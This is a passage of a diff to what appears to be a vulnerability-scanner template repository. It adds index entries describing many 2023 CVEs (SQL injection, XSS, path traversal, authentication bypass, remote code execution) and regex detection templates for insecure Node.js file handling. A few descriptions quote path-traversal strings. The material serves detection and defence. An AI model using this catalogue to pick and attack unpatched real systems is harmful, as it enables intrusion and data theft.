susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0948.yaml"} {"ID":"CVE-2023-0968","Info":{"Name":"WordPress Watu Quiz \u003c3.3.9.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0968.yaml"} +{"ID":"CVE-2023-1020","Info":{"Name":"Steveas WP Live Chat Shoutbox \u003c= 1.4.2 - SQL Injection","Severity":"critical","Description":"The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1020.yaml"} {"ID":"CVE-2023-1080","Info":{"Name":"WordPress GN Publisher \u003c1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1080.yaml"} {"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"} +{"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"} +{"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"} {"ID":"CVE-2023-1671","Info":{"Name":"Sophos Web Appliance - Remote Code Execution","Severity":"critical","Description":"A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1671.yaml"} {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} +{"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"} +{"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} +{"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} {"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} {"ID":"CVE-2023-22897","Info":{"Name":"Securepoint UTM - Leaking Remote Memory Contents","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22897.yaml"} +{"ID":"CVE-2023-23333","Info":{"Name":"SolarView Compact 6.00 - OS Command Injection","Severity":"critical","Description":"SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23333.yaml"} {"ID":"CVE-2023-23488","Info":{"Name":"WordPress Paid Memberships Pro \u003c2.9.8 - Blind SQL Injection","Severity":"critical","Description":"WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23488.yaml"} {"ID":"CVE-2023-23489","Info":{"Name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","Severity":"critical","Description":"WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23489.yaml"} {"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"high","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n\nNote that CVE-2023-23492 incorrectly describes and scores this as SQL injection vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-23492.yaml"} +{"ID":"CVE-2023-2356","Info":{"Name":"Mlflow \u003c2.3.0 - Local File Inclusion","Severity":"high","Description":"Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2356.yaml"} {"ID":"CVE-2023-23752","Info":{"Name":"Joomla! Webservice - Password Disclosure","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-23752.yaml"} {"ID":"CVE-2023-24044","Info":{"Name":"Plesk Obsidian \u003c=18.0.49 - Open Redirect","Severity":"medium","Description":"Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is \"the ability to use arbitrary domain names to access the panel is an intended feature.\"\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24044.yaml"} +{"ID":"CVE-2023-24243","Info":{"Name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","Severity":"high","Description":"CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-24243.yaml"} {"ID":"CVE-2023-24278","Info":{"Name":"Squidex \u003c7.4.0 - Cross-Site Scripting","Severity":"medium","Description":"Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24278.yaml"} {"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","Severity":"medium","Description":"mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24322.yaml"} {"ID":"CVE-2023-24367","Info":{"Name":"Temenos T24 R20 - Cross-Site Scripting","Severity":"medium","Description":"Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24367.yaml"} @@ -1729,17 +1811,37 @@ {"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"} {"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"} {"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"} +{"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"} +{"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"} +{"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"} {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"} {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"} +{"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"critical","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"} {"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"} {"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"medium","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"} {"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"critical","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"} {"ID":"CVE-2023-27292","Info":{"Name":"OpenCATS - Open Redirect","Severity":"medium","Description":"OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-27292.yaml"} +{"ID":"CVE-2023-2732","Info":{"Name":"MStore API \u003c= 3.9.2 - Authentication Bypass","Severity":"critical","Description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2732.yaml"} {"ID":"CVE-2023-27350","Info":{"Name":"PaperCut - Unauthenticated Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27350.yaml"} +{"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"} {"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"high","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"} {"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"} +{"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"} +{"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"} {"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"} {"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"} {"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"} -{"ID":"CVE-2023-29489","Info":{"Name":"cPanel - Cross-Site Scripting","Severity":"medium","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"} +{"ID":"CVE-2023-29489","Info":{"Name":"cPanel - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"} +{"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"} +{"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"} +{"ID":"CVE-2023-29887","Info":{"Name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","Severity":"high","Description":"A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29887.yaml"} +{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"high","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"} {"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"high","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"} +{"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"} +{"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"} +{"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} +{"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"} +{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"medium","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"} +{"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"} +{"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"} +{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"high","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index baecfdb8c2..feec14ad6c 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -007505eab9adec1b628522c2675730ee +6a8d52a6e0f4ae54ace3ababe34a2385 diff --git a/dns/caa-fingerprint.yaml b/dns/caa-fingerprint.yaml index 5175a7bc2c..410f68921e 100644 --- a/dns/caa-fingerprint.yaml +++ b/dns/caa-fingerprint.yaml @@ -28,6 +28,4 @@ dns: regex: - 'issue "(.*)"' - 'issuewild "(.*)"' - - 'iodef "(.*)"' - -# Enhanced by mp on 2022/03/22 + - 'iodef "(.*)"' \ No newline at end of file diff --git a/dns/cname-fingerprint.yaml b/dns/cname-fingerprint.yaml index 9dfd68e76d..f4bd14987a 100644 --- a/dns/cname-fingerprint.yaml +++ b/dns/cname-fingerprint.yaml @@ -27,6 +27,4 @@ dns: - type: regex group: 1 regex: - - "IN\tCNAME\t(.+)" - -# Enhanced by mp on 2022/03/13 + - "IN\tCNAME\t(.+)" \ No newline at end of file diff --git a/dns/cname-service.yaml b/dns/cname-service.yaml index 99534056a2..ff9ebbd14a 100644 --- a/dns/cname-service.yaml +++ b/dns/cname-service.yaml @@ -42,6 +42,4 @@ dns: - type: word name: salesforce-community words: - - "live.siteforce.com" - -# Enhanced by mp on 2022/03/13 + - "live.siteforce.com" \ No newline at end of file diff --git a/file/nodejs/admzip-path-overwrite.yaml b/file/nodejs/admzip-path-overwrite.yaml new file mode 100644 index 0000000000..dbf7ea5442 --- /dev/null +++ b/file/nodejs/admzip-path-overwrite.yaml @@ -0,0 +1,22 @@ +id: admzip-path-overwrite + +info: + name: Admzip Path Overwrite + author: me_dheeraj (https://twitter.com/Dheerajmadhukar) + severity: info + description: Insecure ZIP archive extraction using adm-zip can result in arbitrary path over write and can result in code injection. + tags: file,nodejs,admzip + +file: + - extensions: + - all + + matchers: + - type: regex + regex: + - "require\\\\('adm-zip'\\\\)" + - "\\.forEach\\(function .*\\(.*, \\.\\*\\) \\{" + - "\\.createWriteStream\\(.*\\) \\}, \\.\\*\\)" + - "\\.writeFile\\(.*\\)" + - "\\.writeFileSync\\(.*\\) \\}, \\.\\*\\)" + condition: or diff --git a/file/nodejs/express-lfr.yaml b/file/nodejs/express-lfr.yaml new file mode 100644 index 0000000000..d499b5843d --- /dev/null +++ b/file/nodejs/express-lfr.yaml @@ -0,0 +1,20 @@ +id: express-lfr + +info: + name: Express LFR + author: me_dheeraj (https://twitter.com/Dheerajmadhukar) + severity: info + description: Untrusted user input in express render() function can result in arbitrary file read if hbs templating is used. + tags: file,nodejs,express,lfr + +file: + - extensions: + - all + + matchers: + - type: regex + regex: + - "(\\$[\\w\\W]+?)\\.render\\(\\$[\\w\\W]+?, <[\\w\\W]+? \\\\$[\\w\\W]+? [\\w\\W]+? >\\)" + - "(\\$[\\w\\W]+?)\\.render\\(\\$[\\w\\W]+?, <[\\w\\W]+? \\\\$[\\w\\W]+?\\.\\$[\\w\\W]+? [\\w\\W]+? >\\)" + - "(\\$[\\w\\W]+?)\\.render\\(\\$[\\w\\W]+?, <[\\w\\W]+? \\\\$[\\w\\W]+? [\\w\\W]+? >\\)" + condition: or diff --git a/file/nodejs/generic-path-traversal.yaml b/file/nodejs/generic-path-traversal.yaml new file mode 100644 index 0000000000..87ba851bda --- /dev/null +++ b/file/nodejs/generic-path-traversal.yaml @@ -0,0 +1,21 @@ +id: generic-path-traversal + +info: + name: Generic Path Traversal + author: me_dheeraj (https://twitter.com/Dheerajmadhukar) + severity: info + description: Untrusted user input in readFile()/readFileSync() can endup in Directory Traversal Attacks. + tags: file,nodejs + +file: + - extensions: + - all + + matchers: + - type: regex + regex: + - "[^\\.]*\\.createReadStream\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" + - "[^\\.]*\\.readFile\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" + - "[^\\.]*\\.readFileSync\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" + - "[^\\.]*\\.readFileAsync\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" + 